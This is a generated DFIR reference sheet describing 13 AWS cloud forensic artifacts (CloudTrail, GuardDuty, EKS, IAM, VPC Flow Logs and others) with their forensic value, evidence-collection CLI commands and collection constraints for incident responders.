# AWS Cloud Forensic Artifacts Reference

**Total Artifacts:** 13 | **Generated:** 2026-03-07

---

## Cloud Infrastructure

### AWS CloudTrail Management Events
**Location:** `AWS CloudTrail > Event history (last 90 days) or trail delivery in S3 / CloudWatch Logs`

AWS control-plane audit records for management events including console activity, API calls, IAM changes, role assumptions, service configuration updates, and destructive actions. Event history provides recent management events, while a trail is required for retained delivery to S3 or CloudWatch Logs.

**Forensic Value:** CloudTrail is the primary source for reconstructing attacker activity across AWS accounts. It identifies the calling principal, source IP, user agent, request parameters, and affected resources for changes to IAM, EC2, EKS, ECR, S3, and logging configuration itself. It also reveals anti-forensics such as trail deletion, region disabling, or tampering with guardrail services.

**Tools:** AWS Console, AWS CLI, Athena, CloudWatch Logs Insights, SIEM

**Technologies:** AWS, CloudTrail

**Collection Commands:**
- **AWS CLI:** `aws cloudtrail lookup-events --start-time 2026-03-01T00:00:00Z --end-time 2026-03-07T23:59:59Z --output json > cloudtrail_event_history.json`
- **AWS CLI:** `aws s3 cp s3://<trail-bucket>/AWSLogs/<account-id>/CloudTrail/<region>/ ./cloudtrail/ --recursive`
- **CloudWatch Logs Insights:** `fields @timestamp, eventSource, eventName, userIdentity.type, sourceIPAddress, userAgent | sort @timestamp desc | limit 200`

**Official References:**
- [View CloudTrail events and event history](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)

**Collection Constraints:**
- Event history alone is short-lived and management-event focused; durable investigations require a retained trail or exported sink data.
- Data events and organization-wide visibility depend on pre-incident CloudTrail configuration across the accounts and regions in scope.

### AWS GuardDuty Findings
**Location:** `Amazon GuardDuty detector findings and delegated administrator exports`

Managed threat-detection findings generated from AWS foundational data sources such as CloudTrail management events, VPC Flow Logs, Route 53 Resolver query logs, EKS audit telemetry, and related protection plans.

**Forensic Value:** GuardDuty findings accelerate scoping by surfacing suspicious identities, anomalous API behavior, credential misuse, crypto-mining, exfiltration patterns, and EKS threats that might otherwise require manual multi-source correlation. Findings also preserve service-side context like detector IDs, resource types, severity, and evidence linkage for triage and reporting.

**Tools:** AWS Console, AWS CLI, SIEM

**Technologies:** AWS, GuardDuty

**Collection Commands:**
- **AWS CLI:** `aws guardduty list-detectors --output json > guardduty_detectors.json`
- **AWS CLI:** `aws guardduty list-findings --detector-id <detector-id> --output json > guardduty_finding_ids.json`
- **AWS CLI:** `aws guardduty get-findings --detector-id <detector-id> --finding-ids <finding-id-1> <finding-id-2> > guardduty_findings.json`

**Official References:**
- [GuardDuty foundational data sources](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_data-sources.html)
- [GuardDuty EKS Protection](https://docs.aws.amazon.com/guardduty/latest/ug/kubernetes-protection.html)

**Collection Constraints:**
- GuardDuty findings are summarized detections, not raw telemetry, and must be validated with the underlying logs.
- Coverage depends on which GuardDuty protections and foundational data sources were enabled before the incident.

### Amazon EC2 / EBS / AMI / User Data Metadata
**Location:** `EC2 instance, volume, image, metadata-options, and user-data configuration via EC2 APIs and IMDS`

Instance and storage configuration metadata including instance profile, security groups, attached volumes, AMI lineage, user-data scripts, IMDS configuration, launch templates, and snapshot relationships.

**Forensic Value:** EC2 metadata explains how a workload was launched, what credentials it inherited, what bootstrap scripts ran, and which EBS volumes preserve evidence. It also reveals dangerous user-data scripts, IMDS exposure, cross-account AMI usage, and launch-template tampering that can establish persistence or explain how attacker tooling was deployed at scale.

**Tools:** AWS Console, AWS CLI, EC2 IMDSv2 utilities

**Technologies:** AWS, Amazon EC2

**Collection Commands:**
- **AWS CLI:** `aws ec2 describe-instances --instance-ids i-xxxxxxxxxxxxxxxxx > ec2_instance_metadata.json`
- **AWS CLI:** `aws ec2 describe-volumes --filters Name=attachment.instance-id,Values=i-xxxxxxxxxxxxxxxxx > ec2_attached_volumes.json`
- **AWS CLI:** `aws ec2 describe-instance-attribute --instance-id i-xxxxxxxxxxxxxxxxx --attribute userData > ec2_user_data.json`
- **IMDSv2:** `TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"); curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document > ec2_instance_identity_document.json`

**Official References:**
- [Access instance metadata for an EC2 instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
- [Amazon EBS snapshots](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-snapshots.html)

**Collection Constraints:**
- Metadata is highly time-sensitive because launch templates, user data, and attached resources can be modified quickly during response.
- This evidence explains configuration and credential exposure but does not replace disk, memory, or workload-level acquisition.

### Amazon EKS Control Plane Logs
**Location:** `CloudWatch Logs group /aws/eks/<cluster>/cluster for api, controllerManager, and scheduler log types`

Amazon EKS control-plane logs forwarded to CloudWatch Logs when enabled. Includes API server, controller manager, and scheduler logs that show cluster administration, controller activity, scheduling decisions, and service interactions.

**Forensic Value:** EKS control-plane logs reveal cluster-level abuse that host forensics alone cannot show. They identify cluster configuration changes, suspicious API usage, service-account behavior, workload scheduling on unexpected nodes, and attempts to disable or modify logging. They are also critical for understanding whether malicious workloads were introduced through cluster administration instead of direct node compromise.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights, kubectl

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws eks describe-cluster --name <cluster-name> --query "cluster.logging" > eks_logging_config.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/eks/<cluster-name>/cluster" --start-time 1709251200000 --end-time 1709856000000 > eks_control_plane_logs.json`
- **CloudWatch Logs Insights:** `fields @timestamp, @logStream, @message | filter @logStream like /api|controllerManager|scheduler/ | sort @timestamp desc | limit 200`

**Official References:**
- [Amazon EKS control plane logs](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)

**Collection Constraints:**
- Historical control-plane visibility exists only if the relevant EKS log types were enabled before the incident.
- Large clusters can generate substantial CloudWatch data volumes, so investigators need the exact cluster and region scope early.

### Amazon EKS Kubernetes Audit Logs
**Location:** `CloudWatch Logs group /aws/eks/<cluster>/cluster log type: audit`

Kubernetes audit records emitted by the EKS-managed API server when audit logging is enabled. Captures authenticated requests for pods, secrets, service accounts, configmaps, RBAC objects, exec sessions, and other cluster resources.

**Forensic Value:** Audit logs are the highest-fidelity source for reconstructing attacker actions in the cluster control plane. They reveal secret reads, pod exec abuse, role-binding changes, privilege escalation through service accounts, and direct access to sensitive resources that may never appear in node logs or application telemetry.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights, kubectl

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/eks/<cluster-name>/cluster" --filter-pattern ""audit"" --start-time 1709251200000 --end-time 1709856000000 > eks_audit_logs.json`
- **CloudWatch Logs Insights:** `fields @timestamp, @message | filter @logStream like /audit/ | sort @timestamp desc | limit 200`
- **kubectl:** `kubectl get events --all-namespaces --sort-by=.metadata.creationTimestamp > eks_k8s_events.txt`

**Official References:**
- [Amazon EKS control plane logs](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)
- [Kubernetes auditing](https://kubernetes.io/docs/tasks/debug/debug-cluster/audit/)

**Collection Constraints:**
- Audit visibility depends on EKS logging being enabled and retained for the cluster before the incident.
- Audit events must be correlated with node and workload evidence to prove what happened after the API action completed.

### Amazon ECR CloudTrail and Registry Events
**Location:** `CloudTrail events for ecr.amazonaws.com plus repository and image metadata from ECR APIs`

Registry activity for Amazon Elastic Container Registry including repository creation, policy changes, image push and pull activity, authentication-related events, and image inventory metadata.

**Forensic Value:** ECR events explain how attacker-controlled images entered the environment or how private repositories were enumerated and accessed. They are particularly valuable in supply-chain and container-cluster incidents because they tie image usage back to specific identities, source IPs, and repository mutations that can later be correlated with cluster deployment activity.

**Tools:** AWS Console, AWS CLI, CloudTrail, SIEM

**Technologies:** AWS, Amazon ECR

**Collection Commands:**
- **AWS CLI:** `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventSource,AttributeValue=ecr.amazonaws.com --output json > ecr_cloudtrail_events.json`
- **AWS CLI:** `aws ecr describe-repositories --output json > ecr_repositories.json`
- **AWS CLI:** `aws ecr describe-images --repository-name <repository-name> --output json > ecr_repository_images.json`

**Official References:**
- [Logging Amazon ECR API calls using CloudTrail](https://docs.aws.amazon.com/AmazonECR/latest/userguide/logging-using-cloudtrail.html)

**Collection Constraints:**
- ECR audit evidence explains registry activity, but investigators still need cluster or host evidence to prove image execution on workloads.
- Historical visibility depends on CloudTrail retention and whether registry metadata was preserved before cleanup or deletion.

## Identity & Directory

### AWS IAM Credential Report & Access Key Metadata
**Location:** `AWS IAM > Credential report plus IAM API responses for users and access keys`

IAM credential reporting data covering password status, MFA state, access key age, credential rotation status, and last-used timestamps. Supplemented by access-key metadata and last-used lookups for each IAM user.

**Forensic Value:** IAM credential data exposes long-lived access paths that attackers prefer because they survive instance rebuilds and password resets. The report highlights dormant privileged users, keys that never rotate, accounts without MFA, and access keys that became active during the compromise window. It is critical for confirming which identities require emergency rotation and which old credentials may have supported persistence.

**Tools:** AWS Console, AWS CLI, Spreadsheet / SIEM

**Technologies:** AWS, AWS IAM

**Collection Commands:**
- **AWS CLI:** `aws iam get-credential-report --output text --query Content | base64 --decode > iam_credential_report.csv`
- **AWS CLI:** `for user in $(aws iam list-users --query "Users[].UserName" --output text); do aws iam list-access-keys --user-name "$user" > "iam_access_keys_${user}.json"; done`
- **AWS CLI:** `aws iam get-access-key-last-used --access-key-id <access-key-id> > iam_access_key_last_used.json`

**Official References:**
- [IAM credential report](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_getting-report.html)

**Collection Constraints:**
- The credential report is a point-in-time administrative snapshot and must be paired with CloudTrail for actual use history and sequencing.
- It only covers IAM users and keys, not every temporary or federated credential path used in the environment.

## Authentication & Access

### AWS STS AssumeRole and Temporary Credential Events
**Location:** `CloudTrail management events for sts.amazonaws.com and AssumeRole / federation API calls`

CloudTrail records for AWS Security Token Service activity such as AssumeRole, AssumeRoleWithSAML, AssumeRoleWithWebIdentity, and GetFederationToken. These events show temporary-credential issuance across accounts, identities, and workloads.

**Forensic Value:** STS events explain how an attacker moved between AWS identities without long-lived keys. They reveal the source principal, the target role, cross-account pivots, web identity federation abuse, and short-lived sessions created from compromised workloads. Correlating STS issuance with subsequent API activity reconstructs the real privilege path used during the intrusion.

**Tools:** AWS Console, AWS CLI, Athena, SIEM

**Technologies:** AWS, AWS STS, CloudTrail

**Collection Commands:**
- **AWS CLI:** `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole --start-time 2026-03-01T00:00:00Z --end-time 2026-03-07T23:59:59Z --output json > sts_assumerole_events.json`
- **AWS CLI:** `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventSource,AttributeValue=sts.amazonaws.com --output json > sts_service_events.json`
- **Athena:** `SELECT eventtime, useridentity.arn, eventname, requestparameters, sourceipaddress FROM cloudtrail_logs WHERE eventsource = 'sts.amazonaws.com' AND eventtime BETWEEN TIMESTAMP '2026-03-01 00:00:00' AND TIMESTAMP '2026-03-07 23:59:59';`

**Official References:**
- [AWS STS AssumeRole API](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html)
- [View CloudTrail events and event history](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)

**Collection Constraints:**
- STS activity is visible through CloudTrail, so gaps in trail retention or disabled regions directly reduce visibility.
- Short-lived sessions require correlation with subsequent API activity to determine what the assumed role actually did.

### Amazon EKS Authenticator Logs
**Location:** `CloudWatch Logs group /aws/eks/<cluster>/cluster log type: authenticator`

Authenticator logs produced by Amazon EKS when enabled, showing how IAM principals were mapped into Kubernetes users and groups during cluster authentication decisions.

**Forensic Value:** Authenticator logs bridge the gap between AWS identities and Kubernetes RBAC by showing which IAM role, user, or federated identity actually authenticated to the cluster. They are critical for tracing abused workforce identities, workload roles, or external identities that successfully entered the cluster before performing administrative actions.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/eks/<cluster-name>/cluster" --filter-pattern ""authenticator"" --start-time 1709251200000 --end-time 1709856000000 > eks_authenticator_logs.json`
- **CloudWatch Logs Insights:** `fields @timestamp, @message | filter @logStream like /authenticator/ | sort @timestamp desc | limit 200`

**Official References:**
- [Amazon EKS control plane logs](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)

**Collection Constraints:**
- Authenticator logs exist only when that log type was enabled for the cluster and retained in CloudWatch.
- They map IAM identities into Kubernetes access decisions but do not show the full downstream workload behavior by themselves.

## Network Traffic

### AWS VPC Flow Logs
**Location:** `VPC Flow Logs delivered to CloudWatch Logs, S3, or Kinesis Data Firehose`

Network-flow records for Elastic Network Interfaces (ENIs) covering accepted and rejected traffic with source and destination addresses, ports, protocol, packets, bytes, action, and log status.

**Forensic Value:** VPC Flow Logs are the core AWS network evidence source for confirming connections between instances, containers, NAT gateways, and external infrastructure. They support exfiltration scoping, lateral-movement analysis, and identification of unmanaged assets that contacted attacker infrastructure. Even when packet capture is unavailable, flow logs establish who talked to whom, when, and at what volume.

**Tools:** AWS Console, AWS CLI, Athena, CloudWatch Logs Insights, SIEM

**Technologies:** AWS, VPC Flow Logs

**Collection Commands:**
- **AWS CLI:** `aws ec2 describe-flow-logs --output json > vpc_flow_log_configs.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name <vpc-flow-log-group> --start-time 1709251200000 --end-time 1709856000000 > vpc_flow_events.json`
- **AWS CLI:** `aws s3 cp s3://<log-bucket>/AWSLogs/<account-id>/vpcflowlogs/ ./vpc-flow-logs/ --recursive`

**Official References:**
- [VPC Flow Logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html)

**Collection Constraints:**
- VPC Flow Logs provide network metadata only and never include packet payloads or decrypted application content.
- Coverage depends on flow logging being enabled for the relevant VPCs, subnets, or ENIs before the incident window.

## DNS Analysis

### Amazon Route 53 Resolver Query Logs
**Location:** `Route 53 Resolver query logging to CloudWatch Logs, S3, or Firehose`

Resolver query logs for DNS requests originating from AWS VPC resources or connected on-premises systems using Route 53 Resolver endpoints. Captures query names, types, response codes, VPC identifiers, and source-instance context.

**Forensic Value:** Resolver logs are high-value for exfiltration and C2 investigations because they capture DNS activity from workloads that may never touch an enterprise DNS server. They reveal domain-generation activity, long-subdomain tunneling patterns, beaconing to attacker infrastructure, and cloud workloads resolving external services immediately before suspicious data transfer.

**Tools:** AWS Console, AWS CLI, Athena, CloudWatch Logs Insights, SIEM

**Technologies:** AWS, Route 53 DNS

**Collection Commands:**
- **AWS CLI:** `aws route53resolver list-resolver-query-log-configs --output json > route53_query_log_configs.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name <route53-log-group> --start-time 1709251200000 --end-time 1709856000000 > route53_resolver_queries.json`
- **AWS CLI:** `aws s3 cp s3://<log-bucket>/AWSLogs/<account-id>/route53resolver/ ./route53-resolver/ --recursive`

**Official References:**
- [Resolver query logging](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver-query-logs.html)

**Collection Constraints:**
- Resolver query evidence exists only when Route 53 query logging was configured for the VPCs involved.
- DNS logs show resolution activity, not the full network session or application-layer transaction that followed.

## Execution Evidence

### AWS Systems Manager Session Manager Logs
**Location:** `Systems Manager session history with optional CloudWatch Logs or S3 transcript storage`

Session Manager metadata and optional session transcripts for shell access brokered through AWS Systems Manager instead of SSH or RDP. Includes session start and end times, target instance, actor identity, and transcript destinations when logging is enabled.

**Forensic Value:** Session Manager can become the only authoritative record of interactive access to instances when administrators disable direct SSH or RDP. Session history and transcripts reveal who opened privileged sessions, which hosts they touched, whether session logging was disabled, and what commands were executed when transcript logging was enabled.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs, S3

**Technologies:** AWS, Systems Manager

**Collection Commands:**
- **AWS CLI:** `aws ssm describe-sessions --state History --output json > ssm_session_history.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name <session-manager-log-group> --start-time 1709251200000 --end-time 1709856000000 > ssm_session_logs.json`
- **AWS CLI:** `aws s3 cp s3://<session-manager-bucket>/ ./session-manager-logs/ --recursive`

**Official References:**
- [Logging Session Manager sessions](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-logging.html)

**Collection Constraints:**
- Session transcripts are available only if Session Manager logging was enabled to CloudWatch Logs or S3 before the session occurred.
- Session metadata alone may show access timing without preserving every command executed.

### Amazon EKS Container Insights Telemetry
**Location:** `CloudWatch Container Insights log groups /aws/containerinsights/<cluster>/performance and application logs`

Container Insights telemetry for EKS clusters, including pod inventory, node metrics, container stdout/stderr collection, and cluster performance data routed through CloudWatch.

**Forensic Value:** Container Insights complements audit and authenticator logs by showing what workloads actually ran after they were scheduled. It exposes suspicious images, noisy or short-lived pods, restart storms caused by attacker activity, and runtime log output that can contain exploitation traces, tooling errors, or exfiltration indicators.

**Tools:** AWS Console, AWS CLI, CloudWatch Logs Insights, kubectl

**Technologies:** AWS, Amazon EKS, Kubernetes

**Collection Commands:**
- **AWS CLI:** `aws logs describe-log-groups --log-group-name-prefix "/aws/containerinsights/<cluster-name>" > eks_container_insights_log_groups.json`
- **AWS CLI:** `aws logs filter-log-events --log-group-name "/aws/containerinsights/<cluster-name>/performance" --start-time 1709251200000 --end-time 1709856000000 > eks_container_insights_performance.json`
- **kubectl:** `kubectl get pods --all-namespaces -o wide > eks_pod_inventory.txt`

**Official References:**
- [Deploy Container Insights on Amazon EKS](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/deploy-container-insights-EKS.html)

**Collection Constraints:**
- Container Insights is available only if it was deployed and retained before the incident window.
- Runtime telemetry can be high-volume and short-lived, especially for ephemeral or auto-scaled workloads.

---
*Generated by DFIR Assist*